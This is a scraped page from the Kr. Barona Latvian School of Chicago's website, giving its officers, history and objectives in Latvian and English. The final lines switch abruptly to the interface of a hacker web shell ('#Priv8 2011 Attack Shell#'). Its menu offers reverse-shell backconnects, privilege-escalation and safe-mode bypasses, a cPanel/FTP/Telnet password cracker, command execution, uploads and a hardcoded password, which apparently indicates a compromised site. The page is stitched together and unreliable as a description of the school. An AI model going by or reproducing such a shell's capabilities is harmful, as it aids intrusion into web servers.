KBLS Kr. Barona Latviešu skola Čikāgā
Latvian School of Chicago, Inc.
6551 West Montrose Avenue, Chicago, Illinois 60634-1499
Skolas Pārzine/
Principal:
Elisa Freimane

Priekšsēde/
PTO President
Lita Sīmane

Vice Priekšsēdis/
PTO Vice President
Helmūts Lāčkajs

Kasiere/Treasurer
Laima Magone

Padomes locekli
PTO board members

Daina Albertiņa
Brigita Dimante
Līga Ejupe
Lita Sīmane
Jānis Vilciņš
Jānis Robežnieks


Dežurantiem ...

kalendars

pienākumi

siltās pusdineasČikāgas Krišjāņa Barona latviešu skola

1950. gadā grupa “Čikāgas pēckaŗa iebraucēji” sasauca skola, kas apvieno visas konfesijas un ka mācību programmu noteiks ALAs Izglītības birojs. Sapulce izraudzīja pirmo skolas prezidiju – māc. G. Straumani, J. Vilciņu, V. Pavasari, J. Rītiņu un H. Kreiceru, kas 1951. gada sākumā izvēlēja pirmo skolas pārzini H. Kreiceru. Tā laika divpadsmit skolotāji izraudzīja skolai Krišjāņa Barona vārdu. 1976. – 77. mācību gadā skola pārcēlās uz telpām Ciānas draudzē.

Merki:

Krišjāņa Barona Latviešu Skola Čikāgā mērķis ir iesaistīt bērnus un jauniešus latviešu sabiedrībā un ieinteresētu ģimeņu bērniem un jauniešiem vispārējās mācību programmas ietvaros

  • Mācīt latviešu valodu
  • Dot pamata zināšanas par latviešu tautas kultūru un vēsturi
  • Dot informāciju par svarīgiem notikumiem šodienas Latvijā
Savā darbā skola vadās pēc kristīgas un latviskās ētikas principiem Skola lieto ALAs mācību programmu kā vadlīniju savās mācību programmas izveidošanā

The Chicago Latvian Saturday School

The Latvian School of Chicago was organized in 1950 by Latvian immigrants who fled to the United States from Latvia after WWII. In 1976 the school moved to its present location at the Chicago Latvian Zion Church.

Objectives:

The Latvian School of Chicago shall be to involve children and youth in Latvian community life and to provide interested families and thei r children a program of instruction

  • In Latvian language
  • The fundamentals of Latvian culture and history
  • Important current events of Latvia
In accomplishing these objectives, the School will observe the principles of Christian and Latvian ethics The school uses the American Latvian Association curriculum as a basis for establishing it’s educational progam Skolas ziņas

#Priv8 2011 Attack Shell#

Server Pagerank Site list  Cgi Shell  Python Shell  Symlink Shell  perl Bypass Tools  Auto Root  Kullanici List  ShowsourceRead  Cgi Shell Priv pass=dz  Config Shell  LitespeedBypas
  SsiBypass  SuExecByps  Wordpress Mysql Admin Shell  Joomla Mysql Admin Shell  Php Eval Bypass  Php4 Bind 8888 Eval  Cpanel+Ftp+Telnet Cracker  Safe Mode php.ini  Mini Cgi
Change Dir :
Command Execute :
Upload :
Modeminizde 22 port açik olmali : Php Backconnect 1   Php Backconnect 2  Php Backconnect 3  Php Backconnect 4  Dc Backconnect  Perlsocket  Python Bacconnect  Python izo  Metasploit Bacconnect